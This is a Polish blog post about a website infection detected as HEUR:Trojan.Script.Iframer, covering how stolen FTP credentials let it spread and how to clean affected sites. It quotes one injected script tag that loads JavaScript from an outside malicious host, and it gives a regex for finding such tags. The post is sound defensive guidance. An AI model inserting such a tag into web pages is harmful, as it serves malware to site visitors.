link.png HEUR:Trojan.Script.Iframer - wirus na stronie ← Powrót

Wirusy pojawiające się na stronach ściągają sen z powiek programistom i użytkownikom witryn. Jak się przed nimi ustrzec i jak poradzić sobie jeżeli wirus już zagościł na stronie?

Przyczyny

komunikat-gdata.pngKiedy wirus dostanie się już na stronę, pozostaje pytanie – w jaki sposób się tam znalazł i co zrobić, aby temu zapobiegać? Zwykle w pierwszej kolejności infekowany jest komputer osobisty, z którego wirus wykrada hasła dostępowe do serwera. Przeważnie wyciąga je z klientów FTP takich jak Total Commander czy FileZilla, dlatego tak ważne jest, aby nie zapisywać w nich haseł do poszczególnych serwerów. W przeciwnym wypadku to ułatwienie obróci się przeciwko nam. Nowe wirusy pojawiają się bardzo szybko, dlatego stosowanie darmowych programów antywirusowych zwykle nie zapewnia wystarczającej ochrony o czym sam miałem okazję się przekonać.

Skutki

Mając dostęp do serwera wirus modyfikuje znajdujące się na nim pliki. Najczęściej dokleja fragment swojego kodu do plików JavaScript lub w okolicach znaczników <head> i <body>. Taki kod może wyglądać następująco:

<!--pizda--><script type="text/javascript" src="http://mmm2011.ppcsoft.in/validate.js?ftpid=30515"></script><!--/pizda-->

Może się zdarzyć, że wirus działając w ten sposób spowoduje błąd w kodzie strony, przez co przestanie ona działać. Jeżeli jednak do tego nie dojdzie, programy antywirusowe osób odwiedzających naszą witrynę zaczną blokować do niej dostęp. Jeśli nie pospieszymy się z usunięciem wirusa, nasza strona zostanie oznaczona jako zainfekowana w wyszukiwarce google, a później może zostać całkiem zablokowana w wynikach wyszukiwania.

Rozwiązanie

Czyli jak poradzić sobie z wirusem:

  1. Zmień hasła dostępowe do wszystkich serwerów, które mogły zostać wykradzione.
    To, że w danym momencie jeden z serwerów nie jest zainfekowany nie oznacza, że za dzień lub dwa wirus się tam nie pojawi. Dotychczasowe hasła są już spalone – jeżeli ich nie zmienimy, to nawet po usunięciu wirusa pojawi się on ponownie. Należy również pamiętać, aby nowych haseł nie zapisywać w żadnych programach łączących się z serwerami.
  2. Przeskanuj swój komputer programem antywirusowym, który wykrywa wirusa pojawiającego się na stronie.
    Nie wszystkie antywirusy wykrywają je. Zwykle większość płatnych wersji pozwala na ich wykrycie. Należy sprawdzić również komputery pozostałych osób, które miały dostęp do serwera.
  3. Wgraj kopię zapasową plików. Zwykle firma hostingowa, z której usług korzystamy, robi automatyczne kopie zapasowe plików, więc najprościej zwrócić się do nich o pomoc. Zdarzają się jednak przypadki, gdy z jakichś powodów nie możemy wgrać kopii zapasowej plików lub te istniejące również zawierają wirusa – w takim przypadku sami będziemy musieli wyczyścić pliki. Najprościej zrobić to korzystając z programu umożliwiającego przeszukiwanie większej ilości plików tekstowych w poszukiwaniu określonego wyrażenia np. Notepad++. Pliki należy pobrać z serwera i wyszukać w nich frazę doklejoną do pliku i usunąć (zastąpić pustym ciągiem znaków). Jeżeli frazy doklejane przez wirus różnią się w poszczególnych plikach, konieczne jest napisanie odpowiedniego wyrażenia regularnego, które rozpozna te frazy. Przykładowo dla powyższego fragmentu kodu doklejanego przez wirus, wyrażenie regularne wygląda następująco:

    /\*pizda\*/[.\s\h\H\v\V]*/\*/pizda\*/

    notepad-wyszukiwanie.png

  4. Kiedy mamy już pewność, że wirusa nie ma na stronie, możemy zgłosić w Narzędziach dla webmasterów Google, że strona jest wyczyszczona i można ją sprawdzić w celu odblokowania. Jeżeli strona nie jest jeszcze zainstalowana w Narzędziach dla webmasterów to należy ją tam dodać.